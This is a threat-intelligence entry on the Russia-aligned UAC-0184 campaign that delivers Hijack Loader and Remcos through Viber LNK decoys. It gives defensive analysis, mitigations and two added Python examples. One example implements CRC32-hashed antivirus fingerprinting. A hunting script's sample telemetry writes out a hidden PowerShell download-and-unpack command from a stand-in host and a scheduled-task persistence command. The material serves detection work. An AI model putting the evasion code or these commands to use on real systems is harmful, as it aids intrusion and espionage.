Russia-Aligned Hackers Abuse Viber to Target Ukrainian Military and Government
The Russia-aligned threat actor known as UAC-0184 has been observed targeting Ukrainian military and government entities by leveraging the Viber messaging platform to deliver malicious ZIP archives. "This organization has continued to conduct high-intensity intelligence gathering activities against Ukrainian military and government departments in 2025," the 360 Threat Intelligence Center said in
AI Analysis
Technical Summary
UAC-0184, also tracked as Hive0156, is a Russia-aligned cyber espionage group that has targeted Ukrainian military and government entities since at least early 2024. Its latest campaign, reported in early 2026 by the 360 Threat Intelligence Center, uses the Viber messaging platform to distribute ZIP archives containing Windows shortcut (LNK) files disguised as Microsoft Word and Excel documents. Opening a shortcut shows the victim a decoy while a PowerShell command runs silently and downloads a second archive, "smoothieks.zip", from a remote server.

That archive carries Hijack Loader, which is reconstructed and executed in memory across several stages and relies on DLL side-loading and module stomping to evade security tooling. The loader fingerprints installed security software by comparing CRC32 hashes of known product names (the report lists Kaspersky, Avast, BitDefender, AVG, Emsisoft, Webroot and Microsoft) rather than the cleartext strings, and selects its evasion behaviour accordingly. It establishes persistence through a scheduled task, defeats static signature detection, and finally injects the Remcos Remote Access Trojan (RAT) into the process "chime.exe". Remcos gives the operators broad control of the host, including arbitrary payload execution, data exfiltration and monitoring.

The campaign marks a shift in UAC-0184's delivery tactics, from phishing e-mail to widely used messaging apps such as Viber, Signal and Telegram. The chain as described exploits no software vulnerability; it depends entirely on the user opening the shortcut, and the combination of LNK decoys, in-memory staging and injection into a legitimate process leaves few artefacts on disk. The group's sustained, high-intensity collection against Ukrainian targets makes it a persistent risk to those organizations.
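The hashed product check attributed to Hijack Loader above is a common loader trick: the binary carries only CRC32 constants, compares them against the hash of each running process name, and never exposes the vendor strings to a string-based scanner. The example below is added here to illustrate that technique and how a defender resolves such constants; it is not the loader's code, and the process names, the lower-casing step and the single-vendor-per-name mapping are assumptions, since the report names vendors but not the exact strings hashed.

```python
"""Hashed antivirus fingerprinting, attacker side and defender side.

Added illustration of the CRC32 name-check technique described in the
summary. Not Hijack Loader's code: the cleartext process names below and
the normalisation (lower-case before hashing) are assumptions.
"""
import zlib

# Assumed cleartext names for the vendors the report lists. A real loader
# would embed only the hashes computed from these.
KNOWN_PRODUCTS = {
    "avp.exe": "Kaspersky",
    "AvastSvc.exe": "Avast",
    "bdagent.exe": "BitDefender",
    "avgsvc.exe": "AVG",
    "a2service.exe": "Emsisoft",
    "WRSA.exe": "Webroot",
    "MsMpEng.exe": "Microsoft Defender",
}


def crc32_name(name: str) -> int:
    """CRC32 of the lower-cased UTF-8 name, as an unsigned 32-bit value."""
    return zlib.crc32(name.lower().encode("utf-8")) & 0xFFFFFFFF


# What ships in the binary: a table of 32-bit constants, no vendor strings.
HASH_TABLE = {crc32_name(n): vendor for n, vendor in KNOWN_PRODUCTS.items()}


def fingerprint(process_list):
    """Attacker-side check: which vendors are present, judged by hash only.

    Returns the set of vendor labels whose hashed process name appears in
    the running-process list.
    """
    found = set()
    for proc in process_list:
        vendor = HASH_TABLE.get(crc32_name(proc))
        if vendor:
            found.add(vendor)
    return found


def resolve_hashes(hashes, candidates):
    """Defender-side: map constants pulled from a sample back to names.

    CRC32 is not a secret function, so a wordlist of plausible process
    names recovers the targets. Unresolved constants map to None.
    """
    lookup = {crc32_name(c): c for c in candidates}
    return {h: lookup.get(h) for h in hashes}


if __name__ == "__main__":
    running = ["explorer.exe", "MsMpEng.exe", "avp.exe"]  # constructed sample
    print("vendors seen:", fingerprint(running))
    unknown = [crc32_name("bdagent.exe"), 0xDEADBEEF]
    print("resolved:", resolve_hashes(unknown, KNOWN_PRODUCTS))
```

Two practical points follow from the code. Because CRC32 is a 32-bit checksum, the same wordlist approach that resolves the loader's constants can also turn up accidental collisions, so a resolved name should be confirmed against the sample's behaviour. And because the loader hashes names, a detection written against the vendor strings themselves will not fire; the observable is the enumeration of the process list, not the strings.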
Potential Impact
For European organizations, especially those with strategic or operational ties to Ukraine or working in the defense, intelligence or government sectors, this campaign represents a significant espionage risk. Because the loader fingerprints widely deployed security products and adapts its evasion to them, an up-to-date endpoint suite on its own is not a reliable barrier once a user opens the shortcut. In-memory staging and injection into a legitimate process complicate detection and incident response, and a successful compromise can expose sensitive information, disrupt operations and provide a foothold for lateral movement. Delivery over a consumer messaging platform also sidesteps the mail-gateway controls most organizations rely on: a ZIP received in a chat may not pass through the same scanning and attachment policies as an e-mail attachment. Organizations supporting Ukraine or sharing intelligence with it may be secondary targets or collateral victims. The campaign underscores the need for vigilance against well-crafted social engineering combined with multi-stage malware delivery.
Mitigation Recommendations
European organizations should implement targeted mitigations beyond generic advice:
1) Block, or at least quarantine for inspection, ZIP archives and LNK files received through messaging apps, especially from unverified or unexpected senders. Note that Windows Explorer never shows the .lnk extension, so a shortcut named "Report.docx.lnk" is displayed as "Report.docx"; users cannot tell a shortcut from a document by its name alone.
2) Deploy endpoint detection and response (EDR) tooling that detects in-memory execution, DLL side-loading and process injection behaviours, since the loader and the RAT are never written to disk in a form static signatures will catch.
3) Audit scheduled task creation (Windows Security event 4698, which requires the "Other Object Access Events" audit subcategory) and alert on tasks whose action points into a user-writable directory such as AppData or Temp.
4) Harden PowerShell: enable script block logging (event 4104 in the Microsoft-Windows-PowerShell/Operational log) and module logging, and enforce Constrained Language Mode through an application control policy (WDAC or AppLocker), because setting the language mode by environment variable alone is trivially bypassed.
5) Educate users on the risk of files delivered over messaging platforms and require out-of-band verification before opening an unexpected archive, even from a known contact.
6) Keep operating systems and security products current. This chain exploits no vulnerability, but vendors' behavioural detections for Hijack Loader and Remcos only help if the agents are updated.
7) Segment networks and apply strict egress filtering; forcing workstation traffic through an inspecting proxy exposes RAT command-and-control that does not speak HTTP.
8) Consume threat intelligence feeds for indicators of compromise associated with UAC-0184, Hijack Loader and Remcos RAT.
9) Run regular threat hunts for the behaviours of this chain: Explorer spawning PowerShell that downloads and expands an archive, scheduled tasks created shortly afterwards, and network connections from "chime.exe".
10) Coordinate with national cybersecurity agencies for timely alerts and incident response support.
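The hunting behaviours in items 3, 4 and 9 can be expressed as a small rule set that correlates events per host. The script below is an added example, not tooling from the article or the report: it runs over Sysmon-style process-creation (event 1) and network-connection (event 3) records exported as JSON lines, with a constructed sample embedded so it runs offline. The field names, the 30-minute correlation window, the "two distinct rules" threshold and the assumption that a legitimate chime.exe lives under Program Files are all choices made here, not indicators from the report.

```python
"""Per-host correlation of the UAC-0184 chain over JSON-lines telemetry.

Added hunting example; event shape is Sysmon-like but the records below are
a constructed sample, and all thresholds and paths are assumptions.
"""
import json
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample (not real telemetry): WS-07 shows the full chain,
# WS-12 runs a benign admin script from cmd.exe.
SAMPLE_EVENTS = "\n".join([
    json.dumps({"ts": "2026-01-05T10:00:01", "host": "WS-07", "id": 1,
                "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                "parent": r"C:\Windows\explorer.exe",
                "cmd": "powershell -w hidden -c \"iwr http://example.invalid/smoothieks.zip"
                       " -o $env:TEMP\\s.zip; Expand-Archive $env:TEMP\\s.zip $env:TEMP\\s\""}),
    json.dumps({"ts": "2026-01-05T10:00:04", "host": "WS-07", "id": 1,
                "image": r"C:\Windows\System32\schtasks.exe",
                "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                "cmd": r'schtasks /create /sc minute /mo 5 /tn Updater /tr "C:\Users\u\AppData\Local\Temp\s\chime.exe"'}),
    json.dumps({"ts": "2026-01-05T10:00:09", "host": "WS-07", "id": 3,
                "image": r"C:\Users\u\AppData\Local\Temp\s\chime.exe",
                "dst": "203.0.113.10", "dport": 2404}),
    json.dumps({"ts": "2026-01-05T11:30:00", "host": "WS-12", "id": 1,
                "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                "parent": r"C:\Windows\System32\cmd.exe",
                "cmd": "powershell -File C:\\Scripts\\inventory.ps1"}),
])

DOWNLOAD = re.compile(r"(iwr|invoke-webrequest|downloadfile|downloadstring|start-bitstransfer|curl|wget)", re.I)
ARCHIVE = re.compile(r"(expand-archive|\.zip)", re.I)
USER_WRITABLE = re.compile(r"\\(appdata|temp|programdata|public)\\", re.I)


def rule_lnk_stager(ev):
    """PowerShell spawned by Explorer (what a double-clicked LNK looks like)
    whose command line both fetches and unpacks an archive."""
    return (ev["id"] == 1 and ev["image"].lower().endswith("powershell.exe")
            and ev["parent"].lower().endswith("explorer.exe")
            and DOWNLOAD.search(ev["cmd"]) is not None
            and ARCHIVE.search(ev["cmd"]) is not None)


def rule_schtask_persistence(ev):
    """schtasks /create whose action lives in a user-writable directory."""
    return (ev["id"] == 1 and ev["image"].lower().endswith("schtasks.exe")
            and "/create" in ev["cmd"].lower()
            and USER_WRITABLE.search(ev["cmd"]) is not None)


def rule_chime_beacon(ev):
    """chime.exe making a network connection from outside Program Files
    (assumed to be where a legitimate copy would be installed)."""
    return (ev["id"] == 3 and ev["image"].lower().endswith("chime.exe")
            and "\\program files" not in ev["image"].lower())


RULES = {
    "lnk_stager": rule_lnk_stager,
    "schtask_persistence": rule_schtask_persistence,
    "chime_beacon": rule_chime_beacon,
}


def hunt(jsonl, window=timedelta(minutes=30), min_hits=2):
    """Return {host: sorted rule names} for hosts where at least `min_hits`
    distinct rules fire within `window` of each other.

    Requiring two or more rules in a window keeps a lone benign
    Expand-Archive or schtasks call from paging anyone on its own.
    """
    hits = defaultdict(list)
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        ts = datetime.fromisoformat(ev["ts"])
        for name, rule in RULES.items():
            if rule(ev):
                hits[ev["host"]].append((ts, name))
    findings = {}
    for host, events in hits.items():
        events.sort()
        for i, (t0, _) in enumerate(events):
            names = {n for t, n in events[i:] if t - t0 <= window}
            if len(names) >= min_hits:
                findings[host] = sorted(names)
                break
    return findings


if __name__ == "__main__":
    print(hunt(SAMPLE_EVENTS))
```

To use it on real data, export process-creation and network events from your EDR or Sysmon pipeline into the same flat shape (timestamp, host, event id, image, parent, command line, destination) and tune the download and archive patterns to the cmdlet aliases your fleet actually uses.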
Affected Countries
Ukraine, Poland, Germany, France, United Kingdom, Estonia, Lithuania, Latvia
Technical Details
- Article Source: https://thehackernews.com/2026/01/russia-aligned-hackers-abuse-viber-to.html (fetched 2026-01-05T18:13:39Z, 976 words)
- Threat ID: 695bff543839e4417589374f
- Added to database: 1/5/2026, 6:13:40 PM
- Last enriched: 1/5/2026, 6:13:57 PM
- Last updated: 1/8/2026, 12:41:32 PM